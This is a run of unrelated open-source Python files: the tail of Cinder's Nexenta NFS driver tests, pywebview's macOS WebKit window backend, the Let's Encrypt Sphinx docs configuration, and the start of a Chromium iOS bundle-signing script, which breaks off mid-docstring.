self.TEST_EXPORT2_OPTIONS) ] with mock.patch.object(self.drv, '_read_config_file') as \ mock_read_config_file: mock_read_config_file.return_value = config_data self.drv._load_shares_config( self.drv.configuration.nfs_shares_config) self.assertIn(self.TEST_EXPORT1, self.drv.shares) self.assertIn(self.TEST_EXPORT2, self.drv.shares) self.assertEqual(2, len(self.drv.shares)) self.assertIn(self.TEST_EXPORT1, self.drv.share2nms) self.assertIn(self.TEST_EXPORT2, self.drv.share2nms) self.assertEqual(2, len(self.drv.share2nms.keys())) self.assertEqual(self.TEST_EXPORT2_OPTIONS, self.drv.shares[self.TEST_EXPORT2]) def test_get_capacity_info(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.folder.get_child_props.return_value = { 'available': '1G', 'used': '2G' } total, free, allocated = self.drv._get_capacity_info(self.TEST_EXPORT1) self.assertEqual(3 * units.Gi, total) self.assertEqual(units.Gi, free) self.assertEqual(2 * units.Gi, allocated) def test_get_share_datasets(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self.nms_mock.server.get_prop.return_value = '/volumes' volume_name, folder_name = ( self.drv._get_share_datasets(self.TEST_EXPORT1)) self.assertEqual('stack', volume_name) self.assertEqual('share', folder_name) def test_delete_snapshot(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self._create_volume_db_entry() self.nms_mock.server.get_prop.return_value = '/volumes' self.drv.delete_snapshot({'volume_id': '1', 'name': 'snapshot1'}) self.nms_mock.snapshot.destroy.assert_called_with( 'stack/share/volume-1@snapshot1', '') def test_delete_volume(self): self.drv.share2nms = {self.TEST_EXPORT1: self.nms_mock} self._create_volume_db_entry() self.drv._ensure_share_mounted = lambda *_, **__: 0 self.drv._execute = lambda *_, **__: 0 self.nms_mock.server.get_prop.return_value = '/volumes' self.nms_mock.folder.get_child_props.return_value = None self.drv.delete_volume({ 'id': '1', 'name': 'volume-1', 'provider_location': self.TEST_EXPORT1 }) self.nms_mock.folder.destroy.assert_called_with( 'stack/share/volume-1', '-r') # Check that exception not raised if folder does not exist on # NexentaStor appliance. mock = self.nms_mock.folder.destroy mock.side_effect = exception.NexentaException('Folder does not exist') self.drv.delete_volume({ 'id': '1', 'name': 'volume-1', 'provider_location': self.TEST_EXPORT1 }) class TestNexentaUtils(test.TestCase): def test_str2size(self): values_to_test = ( # Test empty value (None, 0), ('', 0), ('0', 0), ('12', 12), # Test int values (10, 10), # Test bytes string ('1b', 1), ('1B', 1), ('1023b', 1023), ('0B', 0), # Test other units ('1M', units.Mi), ('1.0M', units.Mi), ) for value, result in values_to_test: self.assertEqual(result, utils.str2size(value)) # Invalid format value self.assertRaises(ValueError, utils.str2size, 'A') def test_str2gib_size(self): self.assertEqual(1, utils.str2gib_size('1024M')) self.assertEqual(300 * units.Mi // units.Gi, utils.str2gib_size('300M')) self.assertEqual(1.2 * units.Ti // units.Gi, utils.str2gib_size('1.2T')) self.assertRaises(ValueError, utils.str2gib_size, 'A') def test_parse_nms_url(self): urls = ( ('http://192.168.1.1/', (False, 'http', 'admin', 'nexenta', '192.168.1.1', '2000', '/rest/nms/')), ('http://192.168.1.1:8080', (False, 'http', 'admin', 'nexenta', '192.168.1.1', '8080', '/rest/nms/')), ('https://root:password@192.168.1.1:8080', (False, 'https', 'root', 'password', '192.168.1.1', '8080', '/rest/nms/')), ) for url, result in urls: self.assertEqual(result, utils.parse_nms_url(url))
""" (C) 2014-2018 Roman Sirokov and contributors Licensed under BSD license http://github.com/r0x0r/pywebview/ """ import sys import json import subprocess import webbrowser from threading import Event, Semaphore import Foundation import AppKit import WebKit from PyObjCTools import AppHelper from objc import nil, super, pyobjc_unicode from webview.localization import localization from webview import OPEN_DIALOG, FOLDER_DIALOG, SAVE_DIALOG, parse_file_type, escape_string, _js_bridge_call from webview.util import convert_string, parse_api_js from .js.css import disable_text_select # This lines allow to load non-HTTPS resources, like a local app as: http://127.0.0.1:5000 bundle = AppKit.NSBundle.mainBundle() info = bundle.localizedInfoDictionary() or bundle.infoDictionary() info['NSAppTransportSecurity'] = {'NSAllowsArbitraryLoads': Foundation.YES} class BrowserView: instances = {} app = AppKit.NSApplication.sharedApplication() debug = False cascade_loc = Foundation.NSMakePoint(100.0, 0.0) class AppDelegate(AppKit.NSObject): def applicationDidFinishLaunching_(self, notification): i = list(BrowserView.instances.values())[0] i.webview_ready.set() class WindowDelegate(AppKit.NSObject): def windowShouldClose_(self, window): i = BrowserView.get_instance('window', window) quit = localization['global.quit'] cancel = localization['global.cancel'] msg = localization['global.quitConfirmation'] if not i.confirm_quit or BrowserView.display_confirmation_dialog(quit, cancel, msg): return Foundation.YES else: return Foundation.NO def windowWillClose_(self, notification): # Delete the closed instance from the dict i = BrowserView.get_instance('window', notification.object()) del BrowserView.instances[i.uid] if BrowserView.instances == {}: AppHelper.callAfter(BrowserView.app.stop_, self) class JSBridge(AppKit.NSObject): def initWithObject_(self, api_instance): super(BrowserView.JSBridge, self).init() self.api = api_instance return self def callFunc_withParam_(self, func_name, param): if param is WebKit.WebUndefined.undefined(): param = None i = BrowserView.get_instance('js_bridge', self) _js_bridge_call(i.uid, self.api, func_name, param) def isSelectorExcludedFromWebScript_(self, selector): return Foundation.NO if selector == 'callFunc:withParam:' else Foundation.YES @classmethod def webScriptNameForSelector_(cls, selector): return 'call' if selector == 'callFunc:withParam:' else None class BrowserDelegate(AppKit.NSObject): def webView_contextMenuItemsForElement_defaultMenuItems_(self, webview, element, defaultMenuItems): if BrowserView.debug: return defaultMenuItems else: return nil # Display a JavaScript alert panel containing the specified message def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_(self, webview, message, frame): AppKit.NSRunningApplication.currentApplication().activateWithOptions_(AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.setInformativeText_(message) alert.runModal() # Display a JavaScript confirm panel containing the specified message def webView_runJavaScriptConfirmPanelWithMessage_initiatedByFrame_(self, webview, message, frame): ok = localization['global.ok'] cancel = localization['global.cancel'] if BrowserView.display_confirmation_dialog(ok, cancel, message): return Foundation.YES else: return Foundation.NO # Display an open panel for <input type="file"> element def webView_runOpenPanelForFileButtonWithResultListener_allowMultipleFiles_(self, webview, listener, allow_multiple): i = list(BrowserView.instances.values())[0] files = i.create_file_dialog(OPEN_DIALOG, '', allow_multiple, '', [], main_thread=True) if files: listener.chooseFilenames_(files) else: listener.cancel() def webView_printFrameView_(self, webview, frameview): """ This delegate method is invoked when a script or a user wants to print a webpage (e.g. using the Javascript window.print() method) :param webview: the webview that sent the message :param frameview: the web frame view whose contents to print """ def printView(frameview): # check if the view can handle the content without intervention by the delegate can_print = frameview.documentViewShouldHandlePrint() if can_print: # tell the view to print the content frameview.printDocumentView() else: # get an NSPrintOperaion object to print the view info = AppKit.NSPrintInfo.sharedPrintInfo().copy() # default print settings used by Safari info.setHorizontalPagination_(AppKit.NSFitPagination) info.setHorizontallyCentered_(Foundation.NO) info.setVerticallyCentered_(Foundation.NO) imageableBounds = info.imageablePageBounds() paperSize = info.paperSize() if (Foundation.NSWidth(imageableBounds) > paperSize.width): imageableBounds.origin.x = 0 imageableBounds.size.width = paperSize.width if (Foundation.NSHeight(imageableBounds) > paperSize.height): imageableBounds.origin.y = 0 imageableBounds.size.height = paperSize.height info.setBottomMargin_(Foundation.NSMinY(imageableBounds)) info.setTopMargin_(paperSize.height - Foundation.NSMinY(imageableBounds) - Foundation.NSHeight(imageableBounds)) info.setLeftMargin_(Foundation.NSMinX(imageableBounds)) info.setRightMargin_(paperSize.width - Foundation.NSMinX(imageableBounds) - Foundation.NSWidth(imageableBounds)) # show the print panel print_op = frameview.printOperationWithPrintInfo_(info) print_op.runOperation() AppHelper.callAfter(printView, frameview) # Open target="_blank" links in external browser def webView_decidePolicyForNewWindowAction_request_newFrameName_decisionListener_(self, webview, action, request, name, listener): if name == '_blank': webbrowser.open(request.URL().absoluteString(), 2, True) listener.ignore() # WebPolicyDelegate method, invoked when a navigation decision needs to be made def webView_decidePolicyForNavigationAction_request_frame_decisionListener_(self, webview, action, request, frame, listener): # The event that might have triggered the navigation event = AppKit.NSApp.currentEvent() action_type = action['WebActionNavigationTypeKey'] """ Disable back navigation on pressing the Delete key: """ # Check if the requested navigation action is Back/Forward if action_type == WebKit.WebNavigationTypeBackForward: # Check if the event is a Delete key press (keyCode = 51) if event and event.type() == AppKit.NSKeyDown and event.keyCode() == 51: # If so, ignore the request and return listener.ignore() return # Normal navigation, allow listener.use() # Show the webview when it finishes loading def webView_didFinishLoadForFrame_(self, webview, frame): # Add the webview to the window if it's not yet the contentView i = BrowserView.get_instance('webkit', webview) if i: if not webview.window(): i.window.setContentView_(webview) i.window.makeFirstResponder_(webview) if i.js_bridge: i._set_js_api() if not i.text_select: i.webkit.windowScriptObject().evaluateWebScript_(disable_text_select) i.loaded.set() class FileFilterChooser(AppKit.NSPopUpButton): def initWithFilter_(self, file_filter): super(BrowserView.FileFilterChooser, self).init() self.filter = file_filter self.addItemsWithTitles_([i[0] for i in self.filter]) self.setAction_('onChange:') self.setTarget_(self) return self def onChange_(self, sender): option = sender.indexOfSelectedItem() self.window().setAllowedFileTypes_(self.filter[option][1]) class WebKitHost(WebKit.WebView): def performKeyEquivalent_(self, theEvent): """ Handle common hotkey shortcuts as copy/cut/paste/undo/select all/quit :param theEvent: :return: """ if theEvent.type() == AppKit.NSKeyDown and theEvent.modifierFlags() & AppKit.NSCommandKeyMask: responder = self.window().firstResponder() keyCode = theEvent.keyCode() if responder != None: handled = False range_ = responder.selectedRange() hasSelectedText = len(range_) > 0 if keyCode == 7 and hasSelectedText : #cut responder.cut_(self) handled = True elif keyCode == 8 and hasSelectedText: #copy responder.copy_(self) handled = True elif keyCode == 9: # paste responder.paste_(self) handled = True elif keyCode == 0: # select all responder.selectAll_(self) handled = True elif keyCode == 6: # undo if responder.undoManager().canUndo(): responder.undoManager().undo() handled = True elif keyCode == 12: # quit BrowserView.app.stop_(self) return handled def __init__(self, uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready): BrowserView.instances[uid] = self self.uid = uid if debug: BrowserView.debug = debug BrowserView._set_debugging() self.js_bridge = None self._file_name = None self._file_name_semaphore = Semaphore(0) self._current_url_semaphore = Semaphore(0) self.webview_ready = webview_ready self.loaded = Event() self.confirm_quit = confirm_quit self.title = title self.text_select = text_select self.is_fullscreen = False rect = AppKit.NSMakeRect(0.0, 0.0, width, height) window_mask = AppKit.NSTitledWindowMask | AppKit.NSClosableWindowMask | AppKit.NSMiniaturizableWindowMask if resizable: window_mask = window_mask | AppKit.NSResizableWindowMask # The allocated resources are retained because we would explicitly delete # this instance when its window is closed self.window = AppKit.NSWindow.alloc().\ initWithContentRect_styleMask_backing_defer_(rect, window_mask, AppKit.NSBackingStoreBuffered, False).retain() self.window.setTitle_(title) self.window.setBackgroundColor_(BrowserView.nscolor_from_hex(background_color)) self.window.setMinSize_(AppKit.NSSize(min_size[0], min_size[1])) self.window.setAnimationBehavior_(AppKit.NSWindowAnimationBehaviorDocumentWindow) BrowserView.cascade_loc = self.window.cascadeTopLeftFromPoint_(BrowserView.cascade_loc) # Set the titlebar color (so that it does not change with the window color) self.window.contentView().superview().subviews().lastObject().setBackgroundColor_(AppKit.NSColor.windowBackgroundColor()) self.webkit = BrowserView.WebKitHost.alloc().initWithFrame_(rect).retain() self._browserDelegate = BrowserView.BrowserDelegate.alloc().init().retain() self._windowDelegate = BrowserView.WindowDelegate.alloc().init().retain() self._appDelegate = BrowserView.AppDelegate.alloc().init().retain() self.webkit.setUIDelegate_(self._browserDelegate) self.webkit.setFrameLoadDelegate_(self._browserDelegate) self.webkit.setPolicyDelegate_(self._browserDelegate) self.window.setDelegate_(self._windowDelegate) BrowserView.app.setDelegate_(self._appDelegate) if url: self.url = url self.load_url(url) else: self.loaded.set() if js_api: self.js_bridge = BrowserView.JSBridge.alloc().initWithObject_(js_api) if fullscreen: self.toggle_fullscreen() def show(self): self.window.makeKeyAndOrderFront_(self.window) if not BrowserView.app.isRunning(): # Add the default Cocoa application menu self._add_app_menu() self._add_view_menu() BrowserView.app.activateIgnoringOtherApps_(Foundation.YES) BrowserView.app.run() else: self.webview_ready.set() def destroy(self): AppHelper.callAfter(self.window.close) def set_title(self, title): def _set_title(): self.window.setTitle_(title) AppHelper.callAfter(_set_title) def toggle_fullscreen(self): def toggle(): if self.is_fullscreen: window_behaviour = 1 << 2 # NSWindowCollectionBehaviorManaged else: window_behaviour = 1 << 7 # NSWindowCollectionBehaviorFullScreenPrimary self.window.setCollectionBehavior_(window_behaviour) self.window.toggleFullScreen_(None) AppHelper.callAfter(toggle) self.is_fullscreen = not self.is_fullscreen def get_current_url(self): def get(): self._current_url = self.webkit.mainFrameURL() self._current_url_semaphore.release() AppHelper.callAfter(get) self._current_url_semaphore.acquire() return self._current_url def load_url(self, url): def load(url): page_url = Foundation.NSURL.URLWithString_(url) req = Foundation.NSURLRequest.requestWithURL_(page_url) self.webkit.mainFrame().loadRequest_(req) self.loaded.clear() self.url = url AppHelper.callAfter(load, url) def load_html(self, content, base_uri): def load(content, url): url = Foundation.NSURL.URLWithString_(url) self.webkit.mainFrame().loadHTMLString_baseURL_(content, url) self.loaded.clear() AppHelper.callAfter(load, content, base_uri) def evaluate_js(self, script): def evaluate(script): result = self.webkit.windowScriptObject().evaluateWebScript_(script) JSResult.result = None if result is WebKit.WebUndefined.undefined() or result == 'null' else json.loads(result) JSResult.result_semaphore.release() class JSResult: result = None result_semaphore = Semaphore(0) self.loaded.wait() AppHelper.callAfter(evaluate, script) JSResult.result_semaphore.acquire() return JSResult.result def _set_js_api(self): script = parse_api_js(self.js_bridge.api) self.webkit.windowScriptObject().evaluateWebScript_(script) pwv_obj = self.webkit.windowScriptObject().valueForKey_('pywebview') pwv_obj.setValue_forKey_(self.js_bridge, '_bridge') def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter, main_thread=False): def create_dialog(*args): dialog_type = args[0] if dialog_type == SAVE_DIALOG: save_filename = args[2] save_dlg = AppKit.NSSavePanel.savePanel() save_dlg.setTitle_(localization["global.saveFile"]) if directory: # set initial directory save_dlg.setDirectoryURL_(Foundation.NSURL.fileURLWithPath_(directory)) if save_filename: # set file name save_dlg.setNameFieldStringValue_(save_filename) if save_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: file = save_dlg.filenames() self._file_name = tuple(file) else: self._file_name = None else: allow_multiple = args[1] open_dlg = AppKit.NSOpenPanel.openPanel() # Enable the selection of files in the dialog. open_dlg.setCanChooseFiles_(dialog_type != FOLDER_DIALOG) # Enable the selection of directories in the dialog. open_dlg.setCanChooseDirectories_(dialog_type == FOLDER_DIALOG) # Enable / disable multiple selection open_dlg.setAllowsMultipleSelection_(allow_multiple) # Set allowed file extensions if file_filter: open_dlg.setAllowedFileTypes_(file_filter[0][1]) # Add a menu to choose between multiple file filters if len(file_filter) > 1: filter_chooser = BrowserView.FileFilterChooser.alloc().initWithFilter_(file_filter) open_dlg.setAccessoryView_(filter_chooser) open_dlg.setAccessoryViewDisclosed_(True) if directory: # set initial directory open_dlg.setDirectoryURL_(Foundation.NSURL.fileURLWithPath_(directory)) if open_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: files = open_dlg.filenames() self._file_name = tuple(files) else: self._file_name = None if not main_thread: self._file_name_semaphore.release() if main_thread: create_dialog(dialog_type, allow_multiple, save_filename) else: AppHelper.callAfter(create_dialog, dialog_type, allow_multiple, save_filename) self._file_name_semaphore.acquire() return self._file_name def _add_app_menu(self): """ Create a default Cocoa menu that shows 'Services', 'Hide', 'Hide Others', 'Show All', and 'Quit'. Will append the application name to some menu items if it's available. """ # Set the main menu for the application mainMenu = AppKit.NSMenu.alloc().init() self.app.setMainMenu_(mainMenu) # Create an application menu and make it a submenu of the main menu mainAppMenuItem = AppKit.NSMenuItem.alloc().init() mainMenu.addItem_(mainAppMenuItem) appMenu = AppKit.NSMenu.alloc().init() mainAppMenuItem.setSubmenu_(appMenu) appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.about"]), "orderFrontStandardAboutPanel:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Set the 'Services' menu for the app and create an app menu item appServicesMenu = AppKit.NSMenu.alloc().init() self.app.setServicesMenu_(appServicesMenu) servicesMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.services"], nil, "") servicesMenuItem.setSubmenu_(appServicesMenu) appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append the 'Hide', 'Hide Others', and 'Show All' menu items appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.hide"]), "hide:", "h") hideOthersMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.hideOthers"], "hideOtherApplications:", "h") hideOthersMenuItem.setKeyEquivalentModifierMask_(AppKit.NSAlternateKeyMask | AppKit.NSCommandKeyMask) appMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.showAll"], "unhideAllApplications:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append a 'Quit' menu item appMenu.addItemWithTitle_action_keyEquivalent_(self._append_app_name(localization["cocoa.menu.quit"]), "terminate:", "q") def _add_view_menu(self): """ Create a default View menu that shows 'Enter Full Screen'. """ mainMenu = self.app.mainMenu() # Create an View menu and make it a submenu of the main menu viewMenu = AppKit.NSMenu.alloc().init() viewMenu.setTitle_(localization["cocoa.menu.view"]) viewMenuItem = AppKit.NSMenuItem.alloc().init() viewMenuItem.setSubmenu_(viewMenu) mainMenu.addItem_(viewMenuItem) # TODO: localization of the Enter fullscreen string has no effect fullScreenMenuItem = viewMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.fullscreen"], "toggleFullScreen:", "f") fullScreenMenuItem.setKeyEquivalentModifierMask_(AppKit.NSControlKeyMask | AppKit.NSCommandKeyMask) def _append_app_name(self, val): """ Append the application name to a string if it's available. If not, the string is returned unchanged. :param str val: The string to append to :return: String with app name appended, or unchanged string :rtype: str """ if "CFBundleName" in info: val += " {}".format(info["CFBundleName"]) return val @staticmethod def nscolor_from_hex(hex_string): """ Convert given hex color to NSColor. :hex_string: Hex code of the color as #RGB or #RRGGBB """ hex_string = hex_string[1:] # Remove leading hash if len(hex_string) == 3: hex_string = ''.join([c*2 for c in hex_string]) # 3-digit to 6-digit hex_int = int(hex_string, 16) rgb = ( (hex_int >> 16) & 0xff, # Red byte (hex_int >> 8) & 0xff, # Blue byte (hex_int) & 0xff # Green byte ) rgb = [i / 255.0 for i in rgb] # Normalize to range(0.0, 1.0) return AppKit.NSColor.colorWithSRGBRed_green_blue_alpha_(rgb[0], rgb[1], rgb[2], 1.0) @staticmethod def get_instance(attr, value): """ Return a BrowserView instance by the :value of its given :attribute, and None if no match is found. """ for i in list(BrowserView.instances.values()): try: if getattr(i, attr) == value: return i except AttributeError: break return None @staticmethod def display_confirmation_dialog(first_button, second_button, message): AppKit.NSApplication.sharedApplication() AppKit.NSRunningApplication.currentApplication().activateWithOptions_(AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.addButtonWithTitle_(first_button) alert.addButtonWithTitle_(second_button) alert.setMessageText_(message) alert.setAlertStyle_(AppKit.NSWarningAlertStyle) if alert.runModal() == AppKit.NSAlertFirstButtonReturn: return True else: return False @staticmethod def _set_debugging(): command = ['defaults', 'write', 'org.python.python', 'WebKitDeveloperExtras', '-bool', 'true'] if sys.version < '3': subprocess.call(command) else: subprocess.run(command) def create_window(uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready): def create(): browser = BrowserView(uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready) browser.show() if uid == 'master': create() else: AppHelper.callAfter(create) def set_title(title, uid): BrowserView.instances[uid].set_title(title) def create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types): file_filter = [] # Parse file_types to obtain allowed file extensions for s in file_types: description, extensions = parse_file_type(s) file_extensions = [i.lstrip('*.') for i in extensions.split(';') if i != '*.*'] file_filter.append([description, file_extensions or None]) i = list(BrowserView.instances.values())[0] # arbitary instance return i.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_filter) def load_url(url, uid): BrowserView.instances[uid].load_url(url) def load_html(content, base_uri, uid): BrowserView.instances[uid].load_html(content, base_uri) def destroy_window(uid): BrowserView.instances[uid].destroy() def toggle_fullscreen(uid): BrowserView.instances[uid].toggle_fullscreen() def get_current_url(uid): return BrowserView.instances[uid].get_current_url() def evaluate_js(script, uid): return BrowserView.instances[uid].evaluate_js(script)
# -*- coding: utf-8 -*- # # Let's Encrypt documentation build configuration file, created by # sphinx-quickstart on Sun Nov 23 20:35:21 2014. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import codecs import os import re import sys import mock # http://docs.readthedocs.org/en/latest/faq.html#i-get-import-errors-on-libraries-that-depend-on-c-modules # c.f. #262 sys.modules.update( (mod_name, mock.MagicMock()) for mod_name in ['augeas']) here = os.path.abspath(os.path.dirname(__file__)) # read version number (and other metadata) from package init init_fn = os.path.join(here, '..', 'letsencrypt', '__init__.py') with codecs.open(init_fn, encoding='utf8') as fd: meta = dict(re.findall(r"""__([a-z]+)__ = "([^"]+)""", fd.read())) # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath(os.path.join(here, '..'))) for pkg in 'acme', 'letsencrypt-apache', 'letsencrypt-nginx': sys.path.insert(0, os.path.abspath(os.path.join(here, '..', pkg))) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.viewcode', 'repoze.sphinx.autointerface', 'sphinxcontrib.programoutput', ] autodoc_member_order = 'bysource' autodoc_default_flags = ['show-inheritance', 'private-members'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'Let\'s Encrypt' copyright = u'2014, Let\'s Encrypt Project' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '.'.join(meta['version'].split('.')[:2]) # The full version, including alpha/beta/rc tags. release = meta['version'] # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. default_role = 'py:obj' # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # http://docs.readthedocs.org/en/latest/theme.html#how-do-i-use-this-locally-and-on-read-the-docs # on_rtd is whether we are on readthedocs.org on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # otherwise, readthedocs.org uses their theme by default, so no need to specify it # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'LetsEncryptdoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ ('index', 'LetsEncrypt.tex', u'Let\'s Encrypt Documentation', u'Let\'s Encrypt Project', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'letsencrypt', u'Let\'s Encrypt Documentation', [project], 7), ('man/letsencrypt', 'letsencrypt', u'letsencrypt script documentation', [project], 1), ('man/letsencrypt-renewer', 'letsencrypt-renewer', u'letsencrypt-renewer script documentation', [project], 1), ('man/jws', 'jws', u'jws script documentation', [project], 1), ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'LetsEncrypt', u'Let\'s Encrypt Documentation', u'Let\'s Encrypt Project', 'LetsEncrypt', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = {'http://docs.python.org/': None} todo_include_todos = True
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import argparse import codecs import datetime import fnmatch import glob import os import plistlib import shutil import subprocess import sys import tempfile def GetProvisioningProfilesDir(): """Returns the location of the installed mobile provisioning profiles. Returns: The path to the directory containing the installed mobile provisioning profiles as a string. """ return os.path.join( os.environ['HOME'], 'Library', 'MobileDevice', 'Provisioning Profiles') def LoadPlistFile(plist_path): """Loads property list file at |plist_path|. Args: plist_path: path to the property list file to load. Returns: The content of the property list file as a python object. """ return plistlib.readPlistFromString(subprocess.check_output([ 'xcrun', 'plutil', '-convert', 'xml1', '-o', '-', plist_path])) class Bundle(object): """Wraps a bundle.""" def __init__(self, bundle_path): """Initializes the Bundle object with data from bundle Info.plist file.""" self._path = bundle_path self._data = LoadPlistFile(os.path.join(self._path, 'Info.plist')) @property def path(self): return self._path @property def identifier(self): return self._data['CFBundleIdentifier'] @property def binary_path(self): return os.path.join(self._path, self._data['CFBundleExecutable']) def Validate(self, expected_mappings): """Checks that keys in the bundle have the expected value. Args: expected_mappings: a dictionary of string 